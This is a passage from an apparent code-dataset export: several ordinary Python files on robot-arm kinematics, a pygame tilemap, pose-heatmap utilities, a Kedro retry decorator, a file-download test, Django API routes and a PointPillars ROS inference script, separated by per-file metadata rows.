# joint_angles_full[1::3] = joint_angles
joint_angles_full = np.hstack([0, joint_angles])
return self.rotation_convention * joint_angles_full
def random_sample(self):
'''
Sample the joint configuration space within the limits of each joint
Parameters
----------
None
Returns
-------
None
'''
if hasattr(self, 'joint_limits'):
joint_limits = self.joint_limits
else:
joint_limits = [(-np.pi, np.pi)] * self.n_links
q_start = []
for lim_min, lim_max in joint_limits:
q_start.append(np.random.uniform(lim_min, lim_max))
return np.array(q_start)
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
# return joint_angles[1::3]
return joint_angles[1:]
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
if not hasattr(self, 'joint_limits'):
return joint_angles
else:
angles = []
limit_hit = []
for angle, (lim_min, lim_max) in zip(joint_angles, self.joint_limits):
limit_hit.append(angle < lim_min or angle > lim_max)
angle = max(lim_min, angle)
angle = min(angle, lim_max)
angles.append(angle)
return np.array(angles), np.array(limit_hit)
@property
def n_joints(self):
'''
In a planar arm, the number of joints equals the number of links
'''
return len(self.link_lengths)
def spatial_positions_of_joints(self, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
pos_all_joints = super(PlanarXZKinematicChain, self).spatial_positions_of_joints(*args, **kwargs)
return pos_all_joints #(pos_all_joints[:,::3].T + self.base_loc).T
def create_ik_subchains(self):
'''
Docstring
Parameters
----------
Returns
-------
'''
proximal_link_lengths = self.link_lengths[:2]
distal_link_lengths = self.link_lengths[2:]
self.proximal_chain = PlanarXZKinematicChain2Link(proximal_link_lengths)
if len(self.link_lengths) > 2:
self.distal_chain = PlanarXZKinematicChain(distal_link_lengths)
else:
self.distal_chain = None
def inverse_kinematics(self, target_pos, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
target_pos = target_pos.copy()
target_pos -= self.base_loc
if not hasattr(self, 'proximal_chain') or not hasattr(self, 'distal_chain'):
self.create_ik_subchains()
if len(self.link_lengths) > 2:
distal_angles = kwargs.pop('distal_angles', None)
if distal_angles is None:
# Sample randomly from the joint limits (-pi, pi) if not specified
if not hasattr(self, 'joint_limits') or len(self.joint_limits) < len(self.link_lengths):
joint_limits = [(-pi, pi)] * len(self.distal_chain.link_lengths)
else:
joint_limits = self.joint_limits[2:]
distal_angles = np.array([np.random.uniform(*limits) for limits in joint_limits])
distal_displ = self.distal_chain.endpoint_pos(distal_angles)
proximal_endpoint_pos = target_pos - distal_displ
proximal_angles = self.proximal_chain.inverse_kinematics(proximal_endpoint_pos).ravel()
angles = distal_angles.copy()
joint_angles = proximal_angles.tolist()
angles[0] -= np.sum(proximal_angles)
ik_angles = np.hstack([proximal_angles, angles])
ik_angles = np.array([np.arctan2(np.sin(angle), np.cos(angle)) for angle in ik_angles])
return ik_angles
else:
return self.proximal_chain.inverse_kinematics(target_pos).ravel()
def jacobian(self, theta, old=False):
'''
Returns the first derivative of the forward kinematics function for x and z endpoint positions:
[[dx/dtheta_1, ..., dx/dtheta_N]
[dz/dtheta_1, ..., dz/dtheta_N]]
Parameters
----------
theta : np.ndarray of shape (N,)
Valid configuration for the arm (the jacobian calculations are specific to the configuration of the arm)
Returns
-------
J : np.ndarray of shape (2, N)
Manipulator jacobian in the format above
'''
if old:
# Calculate jacobian based on hand calculation specific to this type of chain
l = self.link_lengths
N = len(theta)
J = np.zeros([2, len(l)])
for m in range(N):
for i in range(m, N):
J[0, m] += -l[i]*np.sin(sum(self.rotation_convention*theta[:i+1]))
J[1, m] += l[i]*np.cos(sum(self.rotation_convention*theta[:i+1]))
return J
else:
# Use the robotics toolbox and the generic D-H convention jacobian
J = self.robot.jacob0(self.calc_full_joint_angles(theta))
return np.array(J[[0,2], 1:])
def endpoint_potent_null_split(self, q, vel, return_J=False):
'''
(Approximately) split joint velocities into an endpoint potent component,
which moves the endpoint, and an endpoint null component which only causes self-motion
'''
J = self.jacobian(q)
J_pinv = np.linalg.pinv(J)
J_task = np.dot(J_pinv, J)
J_null = np.eye(self.n_joints) - J_task
vel_task = np.dot(J_task, vel)
vel_null = np.dot(J_null, vel)
if return_J:
return vel_task, vel_null, J, J_pinv
else:
return vel_task, vel_null
def config_change_nullspace_workspace(self, config1, config2):
'''
For two configurations, determine how much joint displacement is in the "null" space and how much is in the "task" space
Docstring
Parameters
----------
Returns
-------
'''
config = config1
vel = config2 - config1
endpt1 = self.endpoint_pos(config1)
endpt2 = self.endpoint_pos(config2)
task_displ = np.linalg.norm(endpt1 - endpt2)
# compute total displ of individual joints
total_joint_displ = 0
n_joints = len(config1)
for k in range(n_joints):
jnt_k_vel = np.zeros(n_joints)
jnt_k_vel[k] = vel[k]
single_joint_displ_pos = self.endpoint_pos(config + jnt_k_vel)
total_joint_displ += np.linalg.norm(endpt1 - single_joint_displ_pos)
return task_displ, total_joint_displ
def detect_collision(self, theta, obstacle_pos):
'''
Detect a collision between the chain and a circular object
'''
spatial_joint_pos = self.spatial_positions_of_joints(theta).T + self.base_loc
plant_segments = [(x, y) for x, y in zip(spatial_joint_pos[:-1], spatial_joint_pos[1:])]
dist_to_object = np.zeros(len(plant_segments))
for k, segment in enumerate(plant_segments):
dist_to_object[k] = point_to_line_segment_distance(obstacle_pos, segment)
return dist_to_object
def plot_joint_pos(self, joint_pos, ax=None, flip=False, **kwargs):
if ax == None:
plt.figure()
ax = plt.subplot(111)
if isinstance(joint_pos, dict):
joint_pos = np.vstack(list(joint_pos.values()))
elif isinstance(joint_pos, np.ndarray) and np.ndim(joint_pos) == 1:
joint_pos = joint_pos.reshape(1, -1)
elif isinstance(joint_pos, tuple):
joint_pos = np.array(joint_pos).reshape(1, -1)
for pos in joint_pos:
spatial_pos = self.spatial_positions_of_joints(pos).T
shoulder_anchor = np.array([2., 0., -15.])
spatial_pos = spatial_pos# + shoulder_anchor
if flip:
ax.plot(-spatial_pos[:,0], spatial_pos[:,2], **kwargs)
else:
ax.plot(spatial_pos[:,0], spatial_pos[:,2], **kwargs)
return ax
def point_to_line_segment_distance(point, segment):
'''
Determine the distance between a point and a line segment. Used to determine collisions between robot arm links and virtual obstacles.
Adapted from http://stackoverflow.com/questions/849211/shortest-distance-between-a-point-and-a-line-segment
'''
v, w = segment
l2 = np.sum(np.abs(v - w)**2)
if l2 == 0:
return np.linalg.norm(v - point)
t = np.dot(point - v, w - v)/l2
if t < 0:
return np.linalg.norm(point - v)
elif t > 1:
return np.linalg.norm(point - w)
else:
projection = v + t*(w-v)
return np.linalg.norm(projection - point)
class PlanarXZKinematicChain2Link(PlanarXZKinematicChain):
''' Docstring '''
def __init__(self, link_lengths, *args, **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
if not len(link_lengths) == 2:
raise ValueError("Can't instantiate a 2-link arm with > 2 links!")
super(PlanarXZKinematicChain2Link, self).__init__(link_lengths, *args, **kwargs)
def inverse_kinematics(self, pos, **kwargs):
'''
Inverse kinematics for a two-link kinematic chain. These equations can be solved
deterministically.
Docstring
Parameters
----------
pos : np.ndarray of shape (3,)
Desired endpoint position where the coordinate system origin is the base of the arm. y coordinate must be 0
Returns
-------
np.ndarray of shape (2,)
Joint angles which yield the endpoint position with the forward kinematics of this manipulator
'''
pos -= self.base_loc
l_upperarm, l_forearm = self.link_lengths
if np.ndim(pos) == 1:
pos = pos.reshape(1,-1)
# require the y-coordinate to be 0, i.e. flat on the screen
x, y, z = pos[:,0], pos[:,1], pos[:,2]
assert np.all(np.abs(np.array(y)) < 1e-10)
L = np.sqrt(x**2 + z**2)
cos_el_pflex = (L**2 - l_forearm**2 - l_upperarm**2) / (2*l_forearm*l_upperarm)
cos_el_pflex[ (cos_el_pflex > 1) & (cos_el_pflex < 1 + 1e-9)] = 1
el_pflex = np.arccos(cos_el_pflex)
sh_pabd = np.arctan2(z, x) - np.arcsin(l_forearm * np.sin(np.pi - el_pflex) / L)
return np.array([sh_pabd, el_pflex])
| 32.190014
| 138
| 0.561463
| 2,814
| 23,209
| 4.437811
| 0.160625
| 0.044923
| 0.035394
| 0.01065
| 0.275064
| 0.186339
| 0.120035
| 0.10418
| 0.092969
| 0.087524
| 0
| 0.014482
| 0.330561
| 23,209
| 721
| 139
| 32.190014
| 0.789277
| 0.270283
| 0
| 0.149502
| 0
| 0
| 0.022224
| 0
| 0
| 0
| 0
| 0
| 0.006645
| 1
| 0.10299
| false
| 0
| 0.023256
| 0
| 0.245847
| 0.013289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4e7f677ab2a0f132b93e4b1dfb1c29e362f6de
| 3,622
|
py
|
Python
|
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
import pygame
from pygame.math import Vector2
import json, math
class Tilemap:
def __init__(self, tileSize, imgs, chunkSize=8):
self.tileSize = tileSize
self.imgs = imgs
self.drawTiles = []
self.chunks = {}
self.chunkSize = chunkSize
def toChunkScale(self, p):
return math.floor(p/self.tileSize/self.chunkSize)
def toChunkPos(self, p):
return (self.toChunkScale(p[0]), self.toChunkScale(p[1]))
def collidePoint(self, p:Vector2):
cp = self.toChunkPos(p)
if cp in self.chunks:
for rect in self.chunks[cp]:
if rect.collidepoint(p): return True
return False
def _getColRects(self, testPointsX, testPointsY, colRects):
minX = self.toChunkScale(min(testPointsX))
maxX = self.toChunkScale(max(testPointsX))
minY = self.toChunkScale(min(testPointsY))
maxY = self.toChunkScale(max(testPointsY))
testChunkPositions = {
(minX, minY), (minX, maxY),
(maxX, minY), (maxX, maxY)
}
if colRects is None: colRects = []
for pos in testChunkPositions:
if pos in self.chunks:
colRects += self.chunks[pos]
return colRects
def getEntityColRects(self, pos, width, height, vel, colRects=None):
return self._getColRects( \
( pos.x, pos.x + width, pos.x + vel.x, pos.x + width + vel.x ),
( pos.y, pos.y + height, pos.y + vel.y, pos.y + height + vel.y ), \
colRects)
def getRectColRects(self, rect, colRects=None):
return self._getColRects((rect.x, rect.right), (rect.y, rect.bottom), colRects)
def draw(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
winDim = win.get_size()
for layer in self.drawTiles:
for tile in layer:
if tile[0] < winDim[0]+scroll.x and tile[0] > scroll.x-self.tileSize and \
tile[1] < winDim[1]+scroll.y and tile[1] > scroll.y-self.tileSize:
win.blit(self.imgs[tile[2]], (tile[0] - scroll.x, tile[1] - scroll.y))
def drawCollision(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
cols = ((255,0,0), (0,255,0), (0,0,255))
for pos, rects in self.chunks.items():
pygame.draw.rect(win, (255,255,255), \
(pos[0] * self.tileSize * self.chunkSize - scroll.x,\
pos[1] * self.tileSize * self.chunkSize - scroll.y,\
self.tileSize * self.chunkSize, self.tileSize * self.chunkSize), 1)
for i, rect in enumerate(rects):
pygame.draw.rect(win, cols[i%len(cols)], \
(rect.x - scroll.x, rect.y - scroll.y, \
rect.w, rect.h), width=1)
def loadLevel(self, filepath):
with open(filepath, 'r') as f:
data = json.loads(f.read())
for layer in data["drawTiles"]:
tempLayer = []
for key, item in layer.items():
pStr = key.split(';')
x, y = int(pStr[0]), int(pStr[1])
tempLayer.append((x*self.tileSize, y*self.tileSize, item))
self.drawTiles.append(tempLayer)
for pos, rects in data["chunks"].items():
tempRects = []
for rect in rects:
tempRects.append(pygame.Rect(rect))
pStr = pos.split(';')
self.chunks[(int(pStr[0]), int(pStr[1]))] = tempRects
if "extraData" in data:
return data["extraData"]
| 38.126316
| 90
| 0.549144
| 446
| 3,622
| 4.441704
| 0.213004
| 0.066633
| 0.040384
| 0.063099
| 0.13478
| 0.062595
| 0.046441
| 0.046441
| 0.046441
| 0.046441
| 0
| 0.021044
| 0.31778
| 3,622
| 95
| 91
| 38.126316
| 0.780656
| 0
| 0
| 0.025316
| 0
| 0
| 0.009937
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126582
| false
| 0
| 0.037975
| 0.050633
| 0.265823
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e508c95181eba9329a23ec0f597dadfe33c7e09
| 7,295
|
py
|
Python
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 12
|
2018-10-18T06:41:00.000Z
|
2021-07-31T08:19:41.000Z
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 2
|
2019-07-15T13:36:08.000Z
|
2020-03-09T04:39:08.000Z
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 5
|
2019-01-08T01:32:18.000Z
|
2020-08-04T07:42:12.000Z
|
"""
Miscellaneous utility functions.
"""
import random
import time
from contextlib import contextmanager
import math
import numpy as np
import torch
from PIL.ImageDraw import Draw
# Joints to connect for visualisation, giving the effect of drawing a
# basic "skeleton" of the pose.
BONES = {
'right_lower_leg': (0, 1),
'right_upper_leg': (1, 2),
'right_pelvis': (2, 6),
'left_lower_leg': (4, 5),
'left_upper_leg': (3, 4),
'left_pelvis': (3, 6),
'center_lower_torso': (6, 7),
'center_upper_torso': (7, 8),
'center_head': (8, 9),
'right_lower_arm': (10, 11),
'right_upper_arm': (11, 12),
'right_shoulder': (12, 8),
'left_lower_arm': (14, 15),
'left_upper_arm': (13, 14),
'left_shoulder': (13, 8),
}
def draw_skeleton(img, coords, joint_mask=None):
'''Draw a pose skeleton connecting joints (for visualisation purposes).
Left-hand-side joints are connected with blue lines. Right-hand-size joints
are connected with red lines. Center joints are connected with magenta
lines.
Args:
img (PIL.Image.Image): PIL image which the skeleton will be drawn over.
coords (Tensor): 16x2 tensor containing 0-based pixel coordinates
of joint locations. Joints indices are expected to match
http://human-pose.mpi-inf.mpg.de/#download
joint_mask (Tensor, optional): Mask of valid joints (invalid joints
will be drawn with grey lines).
'''
draw = Draw(img)
for bone_name, (j1, j2) in BONES.items():
if bone_name.startswith('center_'):
colour = (255, 0, 255) # Magenta
elif bone_name.startswith('left_'):
colour = (0, 0, 255) # Blue
elif bone_name.startswith('right_'):
colour = (255, 0, 0) # Red
else:
colour = (255, 255, 255)
if joint_mask is not None:
# Change colour to grey if either vertex is not masked in
if joint_mask[j1] == 0 or joint_mask[j2] == 0:
colour = (100, 100, 100)
draw.line([coords[j1, 0], coords[j1, 1], coords[j2, 0], coords[j2, 1]], fill=colour)
def draw_gaussian(img_tensor, x, y, sigma, normalize=False, clip_size=None):
'''Draw a Gaussian in a single-channel 2D image.
Args:
img_tensor: Image tensor to draw to.
x: x-coordinate of Gaussian centre (in pixels).
y: y-coordinate of Gaussian centre (in pixels).
sigma: Standard deviation of Gaussian (in pixels).
normalize: Ensures values sum to 1 when True.
clip_size: Restrict the size of the draw region.
'''
# To me it makes more sense to round() these, but hey - I'm just following the example
# of others.
x = int(x)
y = int(y)
if img_tensor.dim() == 2:
height, width = list(img_tensor.size())
elif img_tensor.dim() == 3:
n_chans, height, width = list(img_tensor.size())
assert n_chans == 1, 'expected img_tensor to have one channel'
img_tensor = img_tensor[0]
else:
raise Exception('expected img_tensor to have 2 or 3 dimensions')
radius = max(width, height)
if clip_size is not None:
radius = clip_size / 2
if radius < 0.5 or x <= -radius or y <= -radius or \
x >= (width - 1) + radius or y >= (height - 1) + radius:
return
start_x = max(0, math.ceil(x - radius))
end_x = min(width, int(x + radius + 1))
start_y = max(0, math.ceil(y - radius))
end_y = min(height, int(y + radius + 1))
w = end_x - start_x
h = end_y - start_y
subimg = img_tensor[start_y:end_y, start_x:end_x]
xs = torch.arange(start_x, end_x).type_as(img_tensor).view(1, w).expand_as(subimg)
ys = torch.arange(start_y, end_y).type_as(img_tensor).view(h, 1).expand_as(subimg)
k = -0.5 * (1 / sigma)**2
subimg.copy_((xs - x)**2)
subimg.add_((ys - y)**2)
subimg.mul_(k)
subimg.exp_()
if normalize:
val_sum = subimg.sum()
if val_sum > 0:
subimg.div_(val_sum)
def encode_heatmaps(coords, width, height, sigma=1):
'''Convert normalised coordinates into heatmaps.'''
# Normalised coordinates to pixel coordinates
coords.add_(1)
coords[:, :, 0].mul_(width / 2)
coords[:, :, 1].mul_(height / 2)
coords.add_(-0.5)
batch_size = coords.size(0)
n_chans = coords.size(1)
target = torch.FloatTensor(batch_size, n_chans, height, width).zero_()
for i in range(batch_size):
for j in range(n_chans):
x = round(coords[i, j, 0])
y = round(coords[i, j, 1])
draw_gaussian(target[i, j], x, y, sigma, normalize=False, clip_size=7)
return target
def get_preds(heatmaps):
batch_size, n_chans, height, width = list(heatmaps.size())
maxval, idx = torch.max(heatmaps.view(batch_size, n_chans, -1), 2)
maxval = maxval.view(batch_size, n_chans, 1)
idx = idx.view(batch_size, n_chans, 1)
coords = idx.repeat(1, 1, 2)
coords[:, :, 0] = coords[:, :, 0] % width
coords[:, :, 1] = coords[:, :, 1] / height
coords = coords.float()
# When maxval is zero, select coords (0, 0)
pred_mask = maxval.gt(0).repeat(1, 1, 2).float()
torch.mul(coords, pred_mask, out=coords)
return coords
def decode_heatmaps(heatmaps, use_neighbours=True):
'''Convert heatmaps into normalised coordinates.'''
coords = get_preds(heatmaps)
_, _, height, width = list(heatmaps.size())
if use_neighbours:
# "To improve performance at high precision thresholds the prediction
# is offset by a quarter of a pixel in the direction of its next highest
# neighbor before transforming back to the original coordinate space
# of the image"
# - Stacked Hourglass Networks for Human Pose Estimation
for i, joint_coords in enumerate(coords):
for j, (x, y) in enumerate(joint_coords):
x = int(x)
y = int(y)
if x > 0 and x < width - 1 and y > 0 and y < height - 1:
hm = heatmaps[i, j]
joint_coords[j, 0] += (0.25 * np.sign(hm[y, x + 1] - hm[y, x - 1]))
joint_coords[j, 1] += (0.25 * np.sign(hm[y + 1, x] - hm[y - 1, x]))
# Pixel coordinates to normalised coordinates
coords.add_(0.5)
coords[:, :, 0].mul_(2 / width)
coords[:, :, 1].mul_(2 / height)
coords.add_(-1)
return coords
def type_as_index(indices, tensor):
if tensor.is_cuda:
return indices.type(torch.cuda.LongTensor)
return indices.type(torch.LongTensor)
def reverse_tensor(tensor, dim):
indices = torch.arange(tensor.size(dim) - 1, -1, -1)
indices = type_as_index(indices, tensor)
return tensor.index_select(dim, indices)
@contextmanager
def timer(meter):
start_time = time.perf_counter()
yield
time_elapsed = time.perf_counter() - start_time
meter.add(time_elapsed)
def generator_timer(generator, meter):
while True:
with timer(meter):
vals = next(generator)
yield vals
def seed_random_number_generators(seed):
"""Seed all random number generators."""
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
| 31.042553
| 92
| 0.615216
| 1,060
| 7,295
| 4.09717
| 0.25566
| 0.02694
| 0.011513
| 0.017269
| 0.120424
| 0.078747
| 0.018881
| 0
| 0
| 0
| 0
| 0.032413
| 0.259904
| 7,295
| 234
| 93
| 31.175214
| 0.771995
| 0.246059
| 0
| 0.056738
| 0
| 0
| 0.058616
| 0
| 0
| 0
| 0
| 0
| 0.007092
| 1
| 0.070922
| false
| 0
| 0.049645
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5750ff5296717b749da87c576b380ec5a0ca38
| 1,818
|
py
|
Python
|
kedro/extras/decorators/retry_node.py
|
hfwittmann/kedro
|
b0d4fcd8f19b49a7916d78fd09daeb6209a7b6c6
|
[
"Apache-2.0"
] | 1
|
2021-11-25T12:33:13.000Z
|
2021-11-25T12:33:13.000Z
|
kedro/extras/decorators/retry_node.py
|
MerelTheisenQB/kedro
|
1eaa2e0fa5d80f96e18ea60b9f3d6e6efc161827
|
[
"Apache-2.0"
] | null | null | null |
kedro/extras/decorators/retry_node.py
|
MerelTheisenQB/kedro
|
1eaa2e0fa5d80f96e18ea60b9f3d6e6efc161827
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the retry decorator, which can be used as
``Node`` decorators to retry nodes. See ``kedro.pipeline.node.decorate``
"""
import logging
from functools import wraps
from time import sleep
from typing import Callable, Type
def retry(
exceptions: Type[Exception] = Exception, n_times: int = 1, delay_sec: float = 0
) -> Callable:
"""
Catches exceptions from the wrapped function at most n_times and then
bundles and propagates them.
**Make sure your function does not mutate the arguments**
Args:
exceptions: The superclass of exceptions to catch.
By default catch all exceptions.
n_times: At most let the function fail n_times. The bundle the
errors and propagate them. By default retry only once.
delay_sec: Delay between failure and next retry in seconds
Returns:
The original function with retry functionality.
"""
def _retry(func: Callable):
@wraps(func)
def _wrapper(*args, **kwargs):
counter = n_times
errors = []
while counter >= 0:
try:
return func(*args, **kwargs)
# pylint: disable=broad-except
except exceptions as exc:
errors.append(exc)
if counter != 0:
sleep(delay_sec)
counter -= 1
if errors:
log = logging.getLogger(__name__)
log.error(
"Function `%s` failed %i times. Errors:\n", func.__name__, n_times
)
log.error("\n".join(str(err) for err in errors))
log.error("Raising last exception")
raise errors[-1]
return _wrapper
return _retry
| 30.3
| 86
| 0.573707
| 210
| 1,818
| 4.866667
| 0.514286
| 0.035225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005076
| 0.349835
| 1,818
| 59
| 87
| 30.813559
| 0.85956
| 0.374587
| 0
| 0
| 0
| 0
| 0.059646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.133333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e57932c1bf27e86e563c5240b4f42764bb1b0f4
| 1,470
|
py
|
Python
|
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
"""Test the ability to download files.
Test target:
- :py:meth:`lmp.dset._base.BaseDset.download`.
"""
import os
from typing import Callable
import pytest
import lmp.dset._base
import lmp.util.path
@pytest.fixture
def file_url() -> str:
"""Download target file URL."""
return 'https://raw.githubusercontent.com/ProFatXuanAll/language-model-playground/main/README.rst'
@pytest.fixture
def file_path(clean_dir_finalizer_factory: Callable[[str], None], exp_name: str, file_url: str, request) -> str:
"""Download file path.
After testing, clean up files and directories created during test.
"""
# Create temporary directory.
abs_dir_path = os.path.join(lmp.util.path.DATA_PATH, exp_name)
if not os.path.exists(abs_dir_path):
os.makedirs(abs_dir_path)
abs_file_path = os.path.join(abs_dir_path, file_url.split(r'/')[-1])
request.addfinalizer(clean_dir_finalizer_factory(abs_dir_path))
return abs_file_path
def test_download_as_text_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as text file."""
lmp.dset._base.BaseDset.download_file(mode='text', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
def test_download_as_binary_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as binary file."""
lmp.dset._base.BaseDset.download_file(mode='binary', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
| 30
| 112
| 0.755782
| 232
| 1,470
| 4.560345
| 0.327586
| 0.075614
| 0.047259
| 0.053875
| 0.365785
| 0.340265
| 0.300567
| 0.300567
| 0.226843
| 0.226843
| 0
| 0.000774
| 0.121088
| 1,470
| 48
| 113
| 30.625
| 0.818111
| 0.238776
| 0
| 0.181818
| 0
| 0.045455
| 0.091996
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.227273
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5ac8d618f9e77a2b39df9c4c03557f518e532c
| 1,347
|
py
|
Python
|
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
from django.urls import path, re_path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework.routers import SimpleRouter, DefaultRouter
from rest_framework_simplejwt import views as jwt_views
from api.views import *
# роутер нужен, чтобы сгенерить урлы под вью сет и самому их не прописывать соотвественно
router = SimpleRouter()
router.register("baskets", BasketViewSet, "baskets")
schema_view = get_schema_view(
openapi.Info(
title="Snippets API",
default_version="v1",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="contact@snippets.local"),
license=openapi.License(name="BSD License"),
),
public=True,
)
urlpatterns = [
path("check/", check_api_view, name="check-api"),
path("token/", jwt_views.TokenObtainPairView.as_view(), name="token-obtain-pair"),
path("token/refresh/", jwt_views.TokenRefreshView.as_view(), name="token-refresh"),
*router.urls,
re_path(r"swagger(?P<format>\.json|\.yaml)$", schema_view.without_ui(cache_timeout=0), name="schema-json"),
path("swagger/", schema_view.with_ui("swagger", cache_timeout=0), name="schema-swagger-ui"),
path("redoc/", schema_view.with_ui("redoc", cache_timeout=0), name="schema-redoc"),
]
| 38.485714
| 111
| 0.723831
| 179
| 1,347
| 5.273743
| 0.47486
| 0.063559
| 0.041314
| 0.054025
| 0.073093
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003436
| 0.135857
| 1,347
| 34
| 112
| 39.617647
| 0.80756
| 0.064588
| 0
| 0
| 0
| 0
| 0.221781
| 0.04372
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5b531d4dae58f3f455001978beda2d6160593c
| 18,417
|
py
|
Python
|
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | 1
|
2021-06-11T00:54:48.000Z
|
2021-06-11T00:54:48.000Z
|
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | null | null | null |
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import pathlib
import pickle
import shutil
import time
from functools import partial
import sys
sys.path.append('../')
from pathlib import Path
import fire
import numpy as np
import torch
import torch.nn as nn
import os
print(torch.__version__)
print(os.environ['PYTHONPATH'])
from google.protobuf import text_format
import rospy
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
from std_msgs.msg import Header
from jsk_recognition_msgs.msg import BoundingBox, BoundingBoxArray
import torchplus
import second.data.kitti_common as kitti
from second.builder import target_assigner_builder, voxel_builder
from second.data.preprocess import merge_second_batch
from second.protos import pipeline_pb2
from second.pytorch.builder import (box_coder_builder, input_reader_builder,
lr_scheduler_builder, optimizer_builder,
second_builder)
from second.utils.eval import get_coco_eval_result, get_official_eval_result
from second.utils.progress_bar import ProgressBar
def get_paddings_indicator(actual_num, max_num, axis=0):
"""
Create boolean mask by actually number of a padded tensor.
:param actual_num:
:param max_num:
:param axis:
:return: [type]: [description]
"""
actual_num = torch.unsqueeze(actual_num, axis+1)
max_num_shape = [1] * len(actual_num.shape)
max_num_shape[axis+1] = -1
